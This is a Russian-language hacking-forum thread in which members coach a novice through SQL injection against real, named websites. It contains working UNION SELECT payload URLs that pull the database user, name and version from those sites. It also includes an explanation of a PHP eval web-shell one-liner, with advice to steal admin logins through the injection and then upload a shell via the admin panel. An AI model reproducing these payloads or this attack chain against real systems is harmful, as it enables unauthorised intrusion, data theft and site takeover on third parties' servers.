Авторские статьи SQL injection полный FAQ

Discussion in 'Статьи' started by Dr.Z3r0, 7 Jul 2007.

  1. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Ламеры атакуют

    При попытке подобрать количество полей вот такая ошибка.
    SELECT * FROM stat WHERE id=1 order by 100000 -- LIMIT 1 failed!
    Unknown column '100000' in 'order clause'
    Подскажите пожалуйста в чём проблема.Не судите строго.Новичёк. :confused:
    http://softobzor.com.ua/stat_info.php?id=1'+GROUP+BY+10000+--+
     
  2. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    _ttp://softobzor.com.ua/stat_info.php?id=-1 +union+select+1,concat_ws(user(),database(),version()),3,4 --
     
  3. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите пожалуйста подробней.Что я не так делал?И что Вы вывели таким кодом.Спасибо. :confused:
     
  4. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    у вас кавычка была лишняя
     
  5. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    а что Вы вывели таким кодом?
     
  6. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите пожалуйста здесь подробнее.
    <?php код вашего шелла ?>'
     
  7. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
    Затем ввожу
    site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
    Ошибка.В чём здесь моя ошибка?Спасибо.
     
  8. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    Таким способом колонки не всегда удаётся узнать, линк в студию
     
  9. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    неправильно поля подобрал...

    Вывод можно получить так

    Code:
    _ttp://www.greenbergresearch.com/index.php?ID=9/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(Hex(version())),14--
    Failed opening '/var/www/html/inc/templates/4.1.12' for inclusion

    А вообще тема для таких вопросов тут
     
    _________________________
  11. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    http://www.greenbergresearch.com/index.php?ID=-1+order+by+15+--+
    False
    http://www.greenbergresearch.com/index.php?ID=-1+order+by+14+--+
    True - Not found

    Значит - Столбцов 14

    дальше багбир разъяснил. Суть в том, что нужно было ID не действительный сделать, -1 или 999999999999 :)
     
  12. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите а вожможно ли залить shell через такую sql уязвимость?И как?Сори за тупой вопрос.Новичёк в этих делах.
     
  13. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Просто не очень понял как при помощи этого кода '<?php eval($_GET[‘e’]) ?>' залить shell.
    Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
     
    #213 Sat-hacker, 30 Aug 2012
    Last edited: 30 Aug 2012
  14. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    просто не пытаешься разобраться вот и спрашиваешь
     
  15. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Всё что получалось по инструкции делал сам,но здесь немножко не понял,буду благодарен за помощь.
     
  16. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    <?php eval($_GET[‘e’]) ?> давай разжуём подробнее
    eval - это команда, которая вычисляет/обрабатывает строку как PHP код. Т.е например <? eval("echo \"Test\";") ?> будет равносильно <? echo "Test"; ?>.
    А $_GET это переменная окружения, которая берёт содержимое из GET переменной, в данном случае переменная "e", т.е test.ru/index.php?e=PHP_Код
    и если index.php будет содержать '<?php eval($_GET[‘e’]) ?>', то скрипт выполнит код из переменной "e". Это своего рода минишелл, с помощью него можно залить полноценный. Через SQL инекцию ты код не выполнишь, за исключением, если БД поддерживает его, что очень редко. В замен в ней ты узнаешь пароль и логин админки и другие интересные данный, но это не всегда удаётся..
    И потом уже через админку льёшь шелл

    Что касается твоего случая... там вообще 4 ветка БД Мускла, так что таблицы необходимо подбирать, для этого можно воспользоваться спец софтом, тем же говнохавиджом. Тебе он самое то..

    З.Ы И судя по твоему нику, ты сам окрещаешь себя как ламера, т.е ты завышаешь свои способности, а сам ничего не умеешь, следовательно можно с большой вероятностью предположить, что ты школьник, без обид. Советую отучится сперва, т.к твой интеллект ещё не развит для уровня логичного понимания запросов
     
    #216 Sharp.Net, 30 Aug 2012
    Last edited: 30 Aug 2012
  17. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Спасибо за обьяснение.А у хавиджа всегда какая-то ошибка,мутная прога.Школу закончил давно,просто сейчас только решил поковыряться с этим всем.
     
  18. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    Прога не мутная, тоже надо уметь пользоваться просто :)
     
  19. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
     
  20. Sharp.Net

    Sharp.Net New Member

    Joined:
    28 Jul 2012
    Messages:
    39
    Likes Received:
    3
    Reputations:
    1
    Покажи, что вставляешь..